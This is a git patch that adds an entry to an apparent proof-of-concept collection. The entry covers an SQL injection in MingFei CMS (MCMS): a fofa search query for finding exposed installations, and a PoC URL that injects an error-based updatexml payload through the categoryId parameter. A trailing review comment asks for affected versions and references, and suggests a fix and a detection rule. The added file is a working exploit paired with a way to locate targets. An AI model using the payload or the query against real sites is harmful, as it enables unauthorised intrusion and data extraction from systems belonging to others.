From beed962c235550a828a465e88ab80c5f408b517a Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 23 Dec 2023 18:24:34 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E9=93=AD=E9=A3=9ECMS=20list=E6=8E=A5?= =?UTF-8?q?=E5=8F=A3=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 铭飞CMS list接口存在SQL注入.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 铭飞CMS list接口存在SQL注入.md diff --git a/铭飞CMS list接口存在SQL注入.md b/铭飞CMS list接口存在SQL注入.md new file mode 100644 index 0000000..6fd8814 --- /dev/null +++ b/铭飞CMS list接口存在SQL注入.md @@ -0,0 +1,12 @@ +## 铭飞CMS list接口存在SQL注入 + +## fofa +``` +body="铭飞MCMS" || body="/mdiy/formData/save.do" || body="static/plugins/ms/1.0.0/ms.js" +``` + +## poc +``` +http://127.0.0.1/cms/content/list?categoryId=1%27%20and%20updatexml(1,concat(0x7e,md5(123),0x7e),1)%20and%20%271 +``` +![image](https://github.com/wy876/POC/assets/139549762/9f9df303-e0b5-4707-a3a8-228e97ab74a0)
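Review bot: The new file 铭飞CMS list接口存在SQL注入.md ("MingFei CMS list endpoint SQL injection") stops at the fofa fingerprint and the PoC URL. It does not say which MCMS versions are affected, cite a vendor advisory or identifier, or give any remediation. Add an affected-version line, a reference, and a fix section. The PoC closes a quote with `%27` in `categoryId` on `/cms/content/list`, so the remediation to document is binding `categoryId` as a query parameter and validating it against the expected ID format. A short detection note would also help defenders, for example flagging requests to that path whose `categoryId` contains a quote or `updatexml(`. Two smaller points: the title and the `fofa` and `poc` sections all use `##`, so the title should be a level-one heading; and the only evidence of the result is a screenshot with the alt text `image`, so describe in text what the response shows so the entry stays usable if the image link breaks.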